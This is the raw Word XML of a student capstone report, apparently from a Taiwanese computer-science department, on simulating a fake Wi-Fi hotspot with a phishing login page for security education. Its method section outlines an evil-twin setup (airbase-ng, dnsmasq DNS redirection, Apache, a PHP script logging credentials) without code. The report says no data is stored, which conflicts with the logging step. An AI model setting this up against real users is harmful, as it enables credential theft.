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E0F3C7" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000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>資訊工程學系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE71A22" w14:textId="77777777" w:rsidR="003B02FD" w:rsidRPr="003B02FD" w:rsidRDefault="003B02FD" w:rsidP="003B02FD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 w:rsidRPr="003B02FD">
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>114學年度專題報告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E2D1CA" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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58970FBE" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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3643D24D" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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62E7AB7D" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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6CAABA3E" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000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>題目：假 Wi-Fi 熱點與釣魚登入頁攻擊實作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7C293" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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60B06A86" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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6AF390E3" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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1D0A381F" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>指導老師：       教授</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C17C738" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27426D89" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A70F178" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>組長:高恩在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>組員:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC5420" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6406B3" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A61C7EA" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643F090A" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614AA4D7" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A2AEA4" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07127797" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000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>中華民國 114年  6 月  17 日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A827D32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lastRenderedPageBreak/>
        <w:t>目錄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B09E0D9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一、 摘要 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503BE13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二、 研究背景與目的 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F9F30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三、 專題內容 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AAEECB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四、 研究方法 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997D369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五、 流程圖 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096520B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bookmarkStart w:id="0" w:name="_heading=h.l8mix6vvfgje" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/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六、 預計完成之工作項目及具體成果 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D61CE1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七、 工作分配與預定進度甘梯圖 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1EB603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bookmarkStart w:id="1" w:name="_heading=h.1e3ps561nj3y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/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八、 遭遇問題與解決方案 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B396100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bookmarkStart w:id="2" w:name="_heading=h.kxvl7slrckuu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/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九、 儀器設備需求表 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B1F46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>十、 參考資料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB6944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>十一、 合法性與道德聲明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F022F52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>十二、 附錄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE198F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30874257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5008D0B5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7D3B8611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6F9343F7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7FA35C6E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391DD1FC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480D8B49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4AA54816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41CB424B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2DBB09F8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7B7A36F2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1A9AE989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43FDFDEB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0202EF5A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45A4EE0B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634CE520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17FEF842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2B86CA94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6D1657FE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0D3AAF60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1F66B258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41D4A3D9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159E996C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007072B2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74ECBB73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lastRenderedPageBreak/>
        <w:t xml:space="preserve">一、 摘要 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0321A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本研究旨在建立一套針對釣魚攻擊與假 Wi-Fi 熱點的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>合法模擬展示平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>，藉此提升大眾對網路連線風險的認知。實驗在封閉環境中模擬駭客建立無線熱點與顯示假登入頁的流程，並針對使用者連線後可能遭遇的情境進行分析。所有操作皆未蒐集真實帳號密碼資料，登入表單輸入僅供模擬並即時銷毀，並強調防禦觀念與使用者警覺教育。研究結果可應用於資安教學、資訊防護訓練與攻防演練展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEED01D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</w:p>
    <w:p w14:paraId="63B292A5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二、 研究背景與目的 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B0A0ED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隨著公共 Wi-Fi 普及，許多使用者習慣自動連接熟悉名稱的無線熱點，而不察覺其中風險。駭客可能建立相似名稱的基地台，引導使用者連線後顯示假登入頁，藉此進行帳密釣魚攻擊。本研究透過模擬平台展示整體攻擊流程與使用者體驗，並在完全知情同意下執行演示，幫助使用者理解如何辨識假熱點與可疑登入頁面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A8DE6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</w:p>
    <w:p w14:paraId="70C2764F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三、 專題內容 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41B905" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:ind w:left="1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="83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0"/>
        <w:gridCol w:w="5855"/>
      </w:tblGrid>
      <w:tr w:rsidR="003646DE" w14:paraId="58242AEA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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3ECA0" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="1200"/>
              <w:jc w:val="center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項目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585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A10C" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="1200"/>
              <w:jc w:val="center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說明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="051F087C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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F3FE0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假 AP 建立流程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585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271A7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使用 airbase-ng 建立名為 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FreeWiFi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 的模擬 SSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="16CC3823" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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53758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網頁模擬登入頁設計</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585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8EA96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自行設計中立風格登入頁（無品牌/無 logo）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="60434DB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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260AC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模擬資料提交流程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585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3702E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輸入帳號密碼後，畫面即時顯示模擬資訊，不儲存任何資料</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="39DABB82" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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8719B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一鍵啟動模擬環境腳本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585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B117E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整合假 AP + DHCP + 網頁顯示流程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="5120D49A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="950"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2450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2E90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使用者教育與防禦提醒頁面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5855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F16F7" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="120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登入頁送出後顯示「您剛剛已遭模擬釣魚攻擊，請學會辨識風險！」</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7388EDBC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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671544AC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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F87298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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17511194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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1C24DF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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBF4B23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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB26C8A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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FA901F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1200"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6577D29F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lastRenderedPageBreak/>
        <w:t>四、 研究方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8040A" w14:textId="77777777" w:rsidR="003646DE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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux 與 airbase-ng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>建立名為「</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>FreeWiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>」的假 AP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1FCB26" w14:textId="77777777" w:rsidR="003646DE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設定 at0 為 fake AP 虛擬介面，分配靜態 IP（192.168.168.1）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C150A3" w14:textId="77777777" w:rsidR="003646DE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 xml:space="preserve">使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 提供 DHCP（192.168.168.x 網段）與 DNS 偽導功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F6344" w14:textId="77777777" w:rsidR="003646DE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架設 Apache2 Web 伺服器，放置 login.html 假登入頁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D010D3" w14:textId="77777777" w:rsidR="003646DE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 xml:space="preserve">透過 PHP 程式 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>post.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 接收帳密並寫入 logs.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562268C9" w14:textId="77777777" w:rsidR="003646DE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使用手機或筆電連上該假熱點，測試登入頁是否跳出，並驗證資料是否成功記錄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011AC3DC" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD8846B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bookmarkStart w:id="3" w:name="_heading=h.5wq1ftrda4co" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/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>五、 流程圖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5CF13C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noProof/>
          <w:color w:val="141823"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22AEF928" wp14:editId="2D9928A8">
                <wp:extent cx="5274310" cy="3076575"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1835434092" name="群組 1835434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76575"/>
                          <a:chOff x="2706525" y="2241700"/>
                          <a:chExt cx="5276650" cy="3076600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="507355625" name="群組 507355625"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2708845" y="2241713"/>
                            <a:ext cx="5274310" cy="3076575"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5276625" cy="3076600"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="1143231893" name="矩形 1143231893"/>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="5276625" cy="3076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FABC03" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646D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271189944" name="群組 271189944"/>
                          <wpg:cNvGrpSpPr/>
                          <wpg:grpSpPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="5274300" cy="3076575"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="5274300" cy="3076575"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="871207975" name="矩形 871207975"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="5274300" cy="3076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146828D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12010952" name="手繪多邊形: 圖案 612010952"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1524273" y="860925"/>
                                <a:ext cx="319466" cy="9144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60000"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="120000" y="6000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599BD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stealth" w="med" len="med"/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="07C9E002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9384511" name="矩形 19384511"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1675254" y="904894"/>
                                <a:ext cx="17503" cy="3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2E9C0EF" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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12700" tIns="0" rIns="12700" bIns="0" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="1487335924" name="矩形 1487335924"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="4043" y="450036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599BD5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DF0D49D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07622520" name="矩形 2007622520"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="4043" y="450036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B59136E" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                      <w:color w:val="000000"/>
                                    </w:rPr>
                                    <w:t>1. 啟動 airbase-ng 假 AP</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="85325" tIns="85325" rIns="85325" bIns="85325" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="767364809" name="手繪多邊形: 圖案 767364809"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="3396369" y="860925"/>
                                <a:ext cx="319466" cy="9144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60000"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="120000" y="6000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599BD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stealth" w="med" len="med"/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="45A815D4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85664064" name="矩形 785664064"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="3547351" y="904894"/>
                                <a:ext cx="17503" cy="3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F13D1EE" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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12700" tIns="0" rIns="12700" bIns="0" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="1988582829" name="矩形 1988582829"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1876140" y="450036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599BD5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121C2B7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00564550" name="矩形 1000564550"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1876140" y="450036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C5EEF11" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                      <w:color w:val="000000"/>
                                    </w:rPr>
                                    <w:t>2. 設定 at0 IP 位址</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="85325" tIns="85325" rIns="85325" bIns="85325" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="370715747" name="手繪多邊形: 圖案 370715747"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="765058" y="1361454"/>
                                <a:ext cx="3744193" cy="3194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120000" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="120000" y="66423"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="66423"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="12000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599BD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stealth" w="med" len="med"/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="50290C4C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76975679" name="矩形 1376975679"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="2543141" y="1519437"/>
                                <a:ext cx="188026" cy="3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F8EF140" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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12700" tIns="0" rIns="12700" bIns="0" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="311127938" name="矩形 311127938"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="3748236" y="450036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599BD5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6DBDD1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04663464" name="矩形 404663464"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="3748236" y="450036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FA3B07" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                      <w:color w:val="000000"/>
                                    </w:rPr>
                                    <w:t>3. 啟動 dnsmasq 提供 DHCP/DNS</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="85325" tIns="85325" rIns="85325" bIns="85325" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="1292626184" name="手繪多邊形: 圖案 1292626184"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1524273" y="2124209"/>
                                <a:ext cx="319466" cy="9144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60000"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="120000" y="6000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599BD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stealth" w="med" len="med"/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="6979179C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06598921" name="矩形 1706598921"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1675254" y="2168179"/>
                                <a:ext cx="17503" cy="3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B0CC50F" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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12700" tIns="0" rIns="12700" bIns="0" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="1407572225" name="矩形 1407572225"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="4043" y="1713320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599BD5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17CD92A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61630359" name="矩形 1161630359"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="4043" y="1713320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D3BD813" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                      <w:color w:val="000000"/>
                                    </w:rPr>
                                    <w:t>4. 使用 apache 顯示登入頁</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="85325" tIns="85325" rIns="85325" bIns="85325" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="1219951922" name="矩形 1219951922"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1876140" y="1713320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599BD5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F3252D" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646D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41129282" name="矩形 841129282"/>
